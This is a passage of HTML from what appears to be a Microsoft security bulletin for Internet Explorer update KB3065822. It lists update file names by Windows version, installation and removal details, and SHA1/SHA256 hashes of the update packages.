class=\"text-base\">Windows6.0-KB3065822-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 7 in all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 7 in all supported Itanium-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3065822-ia64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">IE8-Windows6.0-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">IE8-Windows6.0-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 9 for all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">IE9-Windows6.0-KB3065822-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 9 in all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">IE9-Windows6.0-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-12\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstall of updates. To uninstall an update that is installed by WUSA, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">Security</span>. Under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a href=\"https://support.microsoft.com/help/3065822\" id=\"kb-link-13\" target=\"_self\">file information</a> section</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows 7 (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3065822-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 9 for all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">IE9-Windows6.1-KB3065822-x86.msu</span></td></tr><tr 
class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 9 for all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">IE9-Windows6.1-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 10 for Windows 7 for 32-bit Systems Service Pack 1:<br/><span class=\"text-base\">IE10-Windows6.1-KB3065822-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 10 for Windows 7 for x64-based Systems Service Pack 1:<br/><span class=\"text-base\">IE10-Windows6.1-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 11 for Windows 7 for 32-bit Systems Service Pack 1:<br/><span class=\"text-base\">IE11-Windows6.1-KB3065822-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 11 for Windows 7 for x64-based Systems Service Pack 1:<br/><span class=\"text-base\">IE11-Windows6.1-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-14\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch. Or, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">System and Security</span>. 
Under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a href=\"https://support.microsoft.com/help/3065822\" id=\"kb-link-15\" target=\"_self\">file information</a> section</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows Server 2008 R2 (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3065822-ia64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 9 for all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">IE9-Windows6.1-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 10 for Windows Server 2008 R2 for x64-based Systems Service Pack 1:<br/><span class=\"text-base\">IE10-Windows6.1-KB3065822-x64.msu</span></td></tr><tr 
class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 11 for Windows Server 2008 R2 for x64-based Systems Service Pack 1:<br/><span class=\"text-base\">IE11-Windows6.1-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-16\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch. Or, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">System and Security</span>. 
Under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a href=\"https://support.microsoft.com/help/3065822\" id=\"kb-link-17\" target=\"_self\">file information</a> section</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows 8 and Windows 8.1 (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference Table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Internet Explorer 10 in all supported 32-bit editions of Windows 8:<br/><span class=\"text-base\">Windows8-RT-KB3065822-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 10 in all supported x64-based editions of Windows 8:<br/><span class=\"text-base\">Windows8-RT-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 11 in all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3065822-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 11 in all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 
class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-18\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch. Or, click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and then click <span class=\"text-base\">Windows Update</span>. Under <strong class=\"uiterm\">See also</strong>, click <span class=\"text-base\">Installed updates</span>, and then select from the list of updates<span class=\"text-base\">.</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a href=\"https://support.microsoft.com/help/3065822\" id=\"kb-link-19\" target=\"_self\">file information</a> section</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows Server 2012 and Windows Server 2012 R2 (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td 
class=\"sbody-td\">For Internet Explorer 10 in all supported editions of Windows Server 2012:<br/><span class=\"text-base\">Windows8-RT-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 11 in all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">Windows8.1-KB3065822-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-20\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch. Or, click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and then click <span class=\"text-base\">Windows Update</span>. 
Under <strong class=\"uiterm\">See also</strong>, click <span class=\"text-base\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a href=\"https://support.microsoft.com/help/3065822\" id=\"kb-link-21\" target=\"_self\">file information</a> section</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows RT and Windows RT 8.1 (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Deployment</span></td><td class=\"sbody-td\">This update is available through <a href=\"http://go.microsoft.com/fwlink/?linkid=21130\" id=\"kb-link-22\" target=\"_self\">Windows Update</a>.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">Click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and then click <span class=\"text-base\">Windows Update</span>. 
Under <strong class=\"uiterm\">See also</strong>, click <span class=\"text-base\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">Not applicable</td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">File hash information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">SHA1 hash</th><th class=\"sbody-th\">SHA256 hash</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE10-Windows6.1-KB3065822-x64.msu</td><td class=\"sbody-td\">F6C7FF7EACF64A3A75C0F777C472A7273EDCEF00</td><td class=\"sbody-td\">8879F745DA53B9386C3568D4141179CA083587E249CE3776F6DDA4BAA0BD7267</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE10-Windows6.1-KB3065822-x86.msu</td><td class=\"sbody-td\">7296D7A409DFCC302B8C1010B3D3A08E9D33C7F2</td><td class=\"sbody-td\">35D956165837B1C95D5C94AD7F069FD72CAF6D6A8DDD1A5555DD3D12229EBD9E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE10-Windows6.1-KB3074886-x64.msu</td><td class=\"sbody-td\">E65DB15B393FE6917A689D03BAA81325BB67A1BB</td><td class=\"sbody-td\">ED196D463B5B49511509EDE6BC368CC21306B4A19D0E305A7A46C671532C5598</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE10-Windows6.1-KB3074886-x86.msu</td><td class=\"sbody-td\">847FEBB8AF4C3FF86FD768E6D0D37941CE9E7FAA</td><td 
class=\"sbody-td\">421B966292586BF3AE242D0B84C182A845A45CF5B7134EAAA03953B6EB48154A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE10-Windows6.1-KB3075516-x64.msu</td><td class=\"sbody-td\">A893BC50274A9C22C6A612B41C9113E30F35A45F</td><td class=\"sbody-td\">F864ADF66063A93C1B6030198AD6258D7B40C25D3896EA786E86F82CFA233E00</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE10-Windows6.1-KB3075516-x86.msu</td><td class=\"sbody-td\">CD9CD2D1ABB71D0D32CA793CC7E775A0302020E9</td><td class=\"sbody-td\">923EE94F6F1D4265675BDCA68165B7D11840A21055FA46101D52035953BD954F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE11-Windows6.1-KB3065822-x64.msu</td><td class=\"sbody-td\">23A21BE2947C7F25D95CAB281D7879571537D8A5</td><td class=\"sbody-td\">4846440F1586AD8F8C5D68FD499E9F0D71CCF4F4AA7203580C0A75F08C5A45BC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE11-Windows6.1-KB3065822-x86.msu</td><td class=\"sbody-td\">ECFA22D013B54B1E0177B8ED47C68D39DD152E57</td><td class=\"sbody-td\">135455B0F38281E616852497B417E4F9351DC1F86DBF178D97D20AFA7ED43903</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE11-Windows6.1-KB3074886-x64.msu</td><td class=\"sbody-td\">402E27C98BA8EE2909D1269366446C8DA0905CBD</td><td class=\"sbody-td\">1A70FAFAFFEF5F42938AAC8BD334FB96F67141F1B791BEE725197EA36D2C640B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE11-Windows6.1-KB3074886-x86.msu</td><td class=\"sbody-td\">6593FF8F920F69BE409334CB22449E76400577D4</td><td class=\"sbody-td\">48DCB7701BDAD622F70C0D5C5E9E6424DDAAA00C368CE55CFCEBEAC125C8029D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE11-Windows6.1-KB3075516-x64.msu</td><td class=\"sbody-td\">F64868843DD7CA0AD448AEC6B936A646F819A22F</td><td class=\"sbody-td\">59100C97D878110BA73325A4BD0FEA620F8A718F3D93A9ACE4D653219515873D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE11-Windows6.1-KB3075516-x86.msu</td><td class=\"sbody-td\">F3FBFE707BD1B74BFAA3A32549254EDCA33ED1C0</td><td 
class=\"sbody-td\">72F6E782B696BC87EEADD9FC8BC0750562CB5EB51D409B505403620AF12875B5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-ia64-DEU.exe</td><td class=\"sbody-td\">A475B27B528526DA92474C91130B6A485FCA9F87</td><td class=\"sbody-td\">45449214836E1FA6C531A6727DA9A8021EC5A27232A92C0584A557D5B8857618</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-ia64-ENU.exe</td><td class=\"sbody-td\">21A7BEC2C7E10DBCD4A693BA12DCCC283FC7D1BD</td><td class=\"sbody-td\">81A70140C4926DB4BA1ED038F2BB59190F0ACEED9408D7924633138937C0A676</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-ia64-FRA.exe</td><td class=\"sbody-td\">983C5CC31046CA0FD719B28FF1FE7E8D161CF321</td><td class=\"sbody-td\">39834B3EED14AF1DF405C5DFED982730B65DEC87A450B20137B41F11AC4C2F2B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-ia64-JPN.exe</td><td class=\"sbody-td\">2475A97378B9E834F80E6D3610D1C5763A8C2D75</td><td class=\"sbody-td\">74CB519B42CE25894642AC3B22AD1FD231D1084CE15AA32D8A18C40D13684B92</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-x64-CHS.exe</td><td class=\"sbody-td\">AE2B39840A66417AC80B6603AB7CD959D66C4FAC</td><td class=\"sbody-td\">02D7D1B15CE7F7F3D362015F57E31F7C6ABC2C3CBD7FED2386062372B99B3E07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-x64-CHT.exe</td><td class=\"sbody-td\">EA53B8D8AC24AFACC77E5A17EF92E530C5F075AD</td><td class=\"sbody-td\">AD03548EF2EE51ACE462B888B0B19DF8F629C4A39449C099A5109ED431688EA6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-x64-DEU.exe</td><td class=\"sbody-td\">E0209187EE13D032E4999C412147AFD2839F1496</td><td class=\"sbody-td\">6036873F93FAA3CA7FC350D85792E6E35EFCCB7EAF544A42117CD3EB7F4E002B</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-x64-ENU.exe</td><td class=\"sbody-td\">47B4C49D4D7A07A83635B9E312FA8F79327B69B5</td><td class=\"sbody-td\">376F455C05EE67F2E0980F794B333FE680CC4817B8DF6712FA1D11CA8613A7D9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-x64-ESN.exe</td><td class=\"sbody-td\">0E21B35EF10505E469D7DB01F807EA9CC2D85245</td><td class=\"sbody-td\">23355783E23E860B02B1790927ECDDFBC077F2AFFB108FFECE58739B771B9374</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-x64-FRA.exe</td><td class=\"sbody-td\">6070291A493205BB71095DA971D7221A1BDD4B04</td><td class=\"sbody-td\">69DEF29B4C0B4F3EBF7DCF33E034D8014345060ABC0E3ECA87A354368316731B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-x64-ITA.exe</td><td class=\"sbody-td\">9B1033CD20A78EA3EA8110ED343A10C7B8E13169</td><td class=\"sbody-td\">E0272618B12F68A0E6D009632AA1DB4498D1BC7F38C69EA1C042512766F372EE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-x64-JPN.exe</td><td class=\"sbody-td\">0A46BD10B52FBB5B1DC27C92E959E6521E9D1B70</td><td class=\"sbody-td\">EC64072238882B9A53C3371BDAA1D1810243FD05DFB339835AC53B4A00454401</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-x64-KOR.exe</td><td class=\"sbody-td\">D0396A83BF96586E09A5AB47DCCFF36C97499C68</td><td class=\"sbody-td\">3F75CE4C4D46184026D860FC21E82F373E80598B7244F880E8F4017DD340952D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-x86-CHS.exe</td><td class=\"sbody-td\">C1A9811DAC0229D74CB561BE70598438CA557F8D</td><td class=\"sbody-td\">0664DEC8D41B14962E3A062A787D290019C803F9A886BF12993A3C0EBFA8B5BE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-x86-CHT.exe</td><td class=\"sbody-td\">4E15B377F13DB3362D15026447E2CF7710A1679F</td><td 
class=\"sbody-td\">A0DBDE4F4CC3C12FAF6C651C1886E2BF37C3ED17527BDB38165F1574CCF0CCC8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-x86-CSY.exe</td><td class=\"sbody-td\">DD047D208BBBD3439B9FCAD17605224456D6A6B1</td><td class=\"sbody-td\">959497A5FE89B9516DF452A9E82283086CAF642EFC55DC65711FF4A66532D37D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-x86-DEU.exe</td><td class=\"sbody-td\">F3AAC6B2C88F94956A1990DF2926FC830605EDD5</td><td class=\"sbody-td\">6F1380988E5013B3872E26EAE338F1E948292B2DD723270FBF5D8B0173C21C3E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-x86-ENU.exe</td><td class=\"sbody-td\">3F0B3BBF8AC59287D7FBD5ADBAA0D3C60586CE4E</td><td class=\"sbody-td\">2B47C8A50D3C6EE089F663D544E3EDBA0698FFB5DDE7952B277089EBD0ED742C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-x86-ESN.exe</td><td class=\"sbody-td\">E8F3950CB4222B0AADDB7D717DE168C8707066B6</td><td class=\"sbody-td\">87AB81D9EAEDB1571E0D27586FE5D6FF06E95D5FA7982D869DF585AFD41D43E5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-x86-FRA.exe</td><td class=\"sbody-td\">5062B612871A9E5EC4D3E768D7C855D74F835589</td><td class=\"sbody-td\">D839C12356CE7CF3928862FA19ABDE0ABFBB737340EDD42F3476230773363658</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-x86-HUN.exe</td><td class=\"sbody-td\">ABA53EB8A61A9C252152EA4B6DEA0E89C46E4CBF</td><td class=\"sbody-td\">A1C794FA5BA863B57A37F08E7621486F8D1B436A1BC22C80AEDF2B22A485EBC6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-x86-ITA.exe</td><td class=\"sbody-td\">D2A43D7C4179DF166FC005B86EF7FCCB3C94B18A</td><td class=\"sbody-td\">9FB5CFA85CD8B811B4F916136F4FCECD9C07A59A006E648D5A56AC0867B9B74E</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-x86-JPN.exe</td><td class=\"sbody-td\">80A901D774D72ADDEB8915FCEC86E3C68760FD32</td><td class=\"sbody-td\">76135BC4328C963159DB5F219035A385049D8EB3E9BABD9BB4E7EC07DC53EF96</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-x86-NLD.exe</td><td class=\"sbody-td\">5B5322C656F3DCBB9D0FF29AA7432C8402ECB7FF</td><td class=\"sbody-td\">02EED60A824D336D98CB2E6631B2037B1F6ADEE3F99C78DBA039BDA88913F636</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3065822-x86-SVE.exe</td><td class=\"sbody-td\">E4C620F77A2ED825D86C27F3E38D9FBD4B05E23D</td><td class=\"sbody-td\">F13CDC3E06655EB43054055F8FD7F305D2B3970A8EBA08955F43EB99686A81D7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-ia64-DEU.exe</td><td class=\"sbody-td\">4959CBBB607CF9CFF66E06805AA8D243FE049CAA</td><td class=\"sbody-td\">558F4673836021897912439B912DD35166083A33A610A3BDEC9720D1C36A87D9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-ia64-ENU.exe</td><td class=\"sbody-td\">17CD0B4FE29D31047ED25DEAC43D5E8CBC5AAA34</td><td class=\"sbody-td\">51FB9F61E86D7417988F18561DF41EB4B81152679DF225821D44A2CF043AFD9E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-ia64-FRA.exe</td><td class=\"sbody-td\">322833CF5938B9A84ED805C7216E3275A098CD68</td><td class=\"sbody-td\">CF4B02CF68465A3CA2E0203DE88B00E02AF0E9F447D4D4D126F8031703C52177</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-ia64-JPN.exe</td><td class=\"sbody-td\">06D22364A04E637CAC2FB8A0DBDD4D8C52C30CAB</td><td class=\"sbody-td\">35620781B1A8C80E741D4DAC6453C5A0DD5B1F6E81256FA9326E5D63E4AD1213</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x64-CHS.exe</td><td class=\"sbody-td\">5CC64B9A4052FDA57EF21D3E2AF1F3B4F7715559</td><td 
class=\"sbody-td\">46BE969964BB15FA80A5F07104131FDDDA9389D3AE29D53A55513B44B6088FC4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x64-CHT.exe</td><td class=\"sbody-td\">F97CD874CD185341C431D6ED37346CD76CFFD68D</td><td class=\"sbody-td\">9137630032DB3031B75FB539D620BF9FAE1ED727B7F459F84394945604BABBC3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x64-DEU.exe</td><td class=\"sbody-td\">A793D649602C6E78EF4ABAAE49E03E06181C9336</td><td class=\"sbody-td\">66A323E27654CB4A64867C8417F4FD2B37C33A307F3859EA6189DF8B3DDFD9C1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x64-ENU.exe</td><td class=\"sbody-td\">5A8740664026293DB6BD82682930347D23F7552C</td><td class=\"sbody-td\">FDFA9D030101E6F8597ADCE744A79EAC11AA5F7F2B38BDAC6849784FB5C2EBFD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x64-ESN.exe</td><td class=\"sbody-td\">5AE1733F2DD6C53A3B173F23AB2534A58DD014D0</td><td 